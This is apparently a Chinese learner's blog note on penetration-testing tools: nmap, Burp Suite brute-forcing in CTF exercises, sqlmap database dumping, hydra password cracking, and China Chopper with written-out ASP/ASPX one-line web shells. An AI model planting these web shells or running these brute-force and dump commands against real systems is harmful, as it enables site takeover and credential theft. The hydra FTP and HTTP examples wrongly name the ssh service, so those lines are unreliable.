`今天是渗透测试系列的第一天,今天讲的其实大多数都是扫描工具,还有暴力破解解法
1.nmap扫描
nmap 192.168.0.*
扫描该网段的所有主机
主要功能:
(1)主机发现
(2)端口扫描
(3)版本侦测
(4)操作系统侦测
nmap的常用参数:
-A :选项用于使用进攻性方式扫描
-T4: 指定扫描过程使用的时序,总有6个级别(0-5),级别越高,扫描速度越 快,但也容易被防火墙或IDS检测并屏蔽掉,在网络通讯状况较好的情况下推荐使用T4
-oX test.xml: 将扫描结果生成 test.xml 文件
-oG test.txt: 将扫描结果生成 test.txt 文件
-sn : 只进行主机发现,不进行端口扫描
-O : 指定Nmap进行系统版本扫描
-sV: 指定让Nmap进行服务版本扫描
-p : 扫描指定的端口
-sS/sT/sA/sW/sM:指定使用 TCP SYN/Connect()/ACK/Window/Maimon scans的 方式来对目标主机进行扫描
-sU: 指定使用UDP扫描方式确定目标主机的UDP端口状况
-script
扫描单个主机大域名或IP地址:
2.BurpSuite
BurpSuite 是用于攻击web 应用程序的集成平台,包含了许多工具
Burpsuite默认使用8080端口作为代理,当然,你也可以自己修改端口号。Proxy——>Options,然后下面可以自己修改代理的端口号,默认是8080
这里 Proxy 的 Intercept 这里显示 Intercept is on 表示拦截包开启,所有代理的包都必须先经过burpsuite放行才可以走。
一道需要用bp爆破的题
首先呢先随便输个四位数的数,再把验证码填上。然后打开代理
抓包
发送到 Intruder
对没用的内容进行修改
设置载荷类型为数字并填写起始数和每步多少
最后跑起来,排个序,会发现个长度和其他不一样的就是密码
得到flag
做完这道题之后又发了一道爆破题。这道题有点东西。
这要是爆破得跑到啥时候。后来仔细看了一下破解版是可以调速度的。
改个速度。
还是先挂代理,随便输个五位数,再抓包,
再发送到Intruder进行调整
还是只标记密码
修改线程数,试了下最多也就一百二十多
然后开跑
跑出来是13579
输入得到flag
3.sqlmap
sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限
这是操作的一些参数
操作步骤,sql注入嘛,都是一步一步入手 数据库到表到列
–dbs列举数据库
–current-db 当前数据库
-D security --tables 指定名为security的数据库列举出其中的表
然后-D security -T users columns查列
–dump 获取数据,
4.hydra
Hydra是一款非常强大的暴力破解工具,它是由著名的黑客组织THC开发的一款开源暴力破解工具
hydra参数:
-R:继续从上一次进度接着破解
-S:大写,采用SSL链接
-s :小写,可通过这个参数指定非默认端口
-l :指定破解的用户,对特定用户破解
-L :指定用户名字典
-p :小写,指定密码破解,少用,一般是采用密码字典
-P :大写,指定密码字典
-e :可选,n:空密码试探,s:使用指定用户和密码试探
-C :使用冒号分割格式,例如“登录名:密码”来
代替 -L/-P 参数
-M :指定目标列表文件一行一条
-o :指定结果输出文件
-f :在使用-M参数以后,找到第一对登录名或者密码的时候中止破解
-t :同时运行的线程数,默认为16
-w :设置最大超时的时间,单位秒,默认是30s
-v / -V:显示详细过程
server:目标ip
service:指定服务名,支持的服务和协议:telnet ftp ncp afp等等
破解ssh
hydra -L user.txt -P passwd.txt -o ssh.txt -vV -t 5 target_IP ssh
-L指定用户字典 -P 指定密码字典 -o把成功的输出到ssh.txt文件 -vV显示详细信息
破解FTP:
hydra -L user.txt -P passwd.txt -o ftp.txt -vV -t 5 target_IP ssh
-L指定用户名列表
-P指定密码字典
-o把爆破的输出到文件
-t指定线程
-vV 显示详细信息
破解HTTP:
hydra -L user.txt -P passwd.txt -o ssh.txt -vV -t 5 target_IP ssh
暴力破解密码是一种低级的破解技巧,但在对那些使用默认密码和密码过于简单的的用户是一种不错的方法。有指定的用户名列表和指定的密码字典,这种情况用hydra是极好的。
5.中国菜刀
基本操作:往目标网站中加入一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取
这里就涉及到一句话木马–。
一句话木马就是只需要一行代码的木马,短短一行代码,就能做到和大马相当的功能。为了绕过waf的检测,一句话木马出现了无数中变形,但本质是不变的:木马的函数执行了我们发送的命令。
简单的一句话木马:
PHP:
Asp:
<%eval request (“pass”)%>
Aspx:
<%@ Page Language=“Jscript”%><%eval(Request.Item[“pass”],“unsafe”);%>
php【基本原理】利用文件上传漏洞,往目标网站中上传一句话木马,然后你就可以在本地通过中国菜刀chopper.exe即可获取和控制整个网站目录。@表示后面即使执行错误,也不报错。eval()函数表示括号内的语句字符串什么的全都当做代码执行。$_POST[‘pass’]表示从页面中获得attack这个参数值。
中国蚁剑
和菜刀相似 但是功能比菜刀强大
这俩工具都是往目标网站上传一句话木马,然后在 本地就能够去控制
然后就能去修改文件
128
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
